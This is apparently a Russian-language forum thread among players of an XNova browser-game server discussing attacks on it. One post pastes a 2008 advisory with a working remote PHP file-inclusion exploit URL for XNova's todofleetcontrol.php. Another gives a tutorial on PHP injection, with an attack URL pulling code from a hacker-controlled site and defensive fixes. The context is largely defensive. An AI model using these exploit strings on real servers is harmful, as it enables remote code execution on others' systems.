я так помницо чат Тусовка ломал (да простит меня Мазар), но уже на те времена там какая то защитка стояла
knife, эта дыра у нас вроде закрыта. Вообщем голова не варит уже, еще чуток помучаемся и отложим до завтра. Раньше 12-14 часов точно не откроем. Друзья, если есть такие, кто хочет, и главное может, помочь с кодом напишите, пожалуйста, мне в личку.
=)))) Как обычно - грибам - спать... =) офигенное решение серва. чесслолво. =) Ща спать поеду домой без головняков =)
всем спокойной ночи!радуйтесьпотом поспать не удасться.и вобще...Друзья!ВСЕ у кого есть знакомые(хорошо и не очень)программисты(хакеры),свяжитесь с ними!пусть помогут!ведь этот сервер объединил нас!и всяким му..кам и придуркам которые его пытаются сломать нельзя его отдать просто так!надо бороться!а если каждый внесет свою(пусть маленькую) лепту то мы не только отстоим сервер но и найдем тех кто атакует его.с занесением в грудину...раз этак по 2-3 на каждого активного игрока.
PHP-инклюдинг в XNova Автор: Semu Дата: 01.09.2008 13:54:29 Версия для печати / Отправить ссылку / Добавить в: Программа: XNova 0.8 sp1 Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных сценарием todofleetcontrol.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Эксплоит: target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]? Для новой версии xnova: target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?
PHP-инъекция PHP-инъекция (PHP-инклудинг, англ. PHP injection), include-баг — один из способов взлома веб-сайтов, работающих на PHP. Он заключается в том, чтобы выполнить нужный код на серверной стороне сайта. Уязвимыми функциями являются eval(), preg_replace() (с модификатором «e»), require_once(), include_once(), include(), require(), create_function(). Это становится возможным, если входной параметр принимается и используется без фильтрации. Пример <? ... $module = $_GET['module']; include $module . '.php'; ... ?> Этот скрипт уязвим, так как к содержимому переменной $module просто прибавляется «.php» и по полученному пути подключается файл. Взломщик может на своём сайте создать файл, содержащий PHP-код (http://hackersite.com/inc.php), и зайдя на сайт по ссылке вроде http://mysite.com/index.php?module=http://hackersite.com/inc выполнить любые PHP-команды. Вверх Способы защиты Существует несколько способов защиты от такой атаки: Проверять, не содержит ли переменная $module посторонние символы: <? ... $module = $_GET['module']; if (strpbrk($module, '.?/:')) die('Blocked'); include $module. '.php'; ... ?> Проверять, что $module присвоено одно из допустимых значений: <? ... $module = $_GET['module']; $arr = array('main', 'about', 'links', 'forum'); if (!in_array($module,$arr)) $module = $arr[0]; include $module . '.php'; ... ?> Этот способ является более эффективным, красивым и аккуратным. PHP предоставляет также возможность отключения использования удаленных файлов, это реализуется путем изменения значения опции allow_url_fopen на Off в файле конфигурации php.ini. Описанная уязвимость представляет высокую опасность для сайта и авторам PHP-скриптов не надо забывать про неё.
Некра сказал, что данная погрешность устранена. А вот за способ разрешения благодарю, возьму на заметку.
Обычно, на сколько мне известно хакеры атакуют безцельно, с мыслью "а смогу ли я"))) при этом серв они выбирают похеру какой, лишь бы защиты поменьше и стараются не запалиться с айпи, хотя хз как это все делается
Рецепт как стать хакером: 1. Купить комп. 2. Завалить комнату с компом пустыми банками из под пива, закидать окурками. 3. Сесть посреди этого бедлама за комп, открыть порнушный сайт и сказать: "Ну всё @#%, я Хакер!" 4. После этого всё время ждать настойчивого стука в дверь......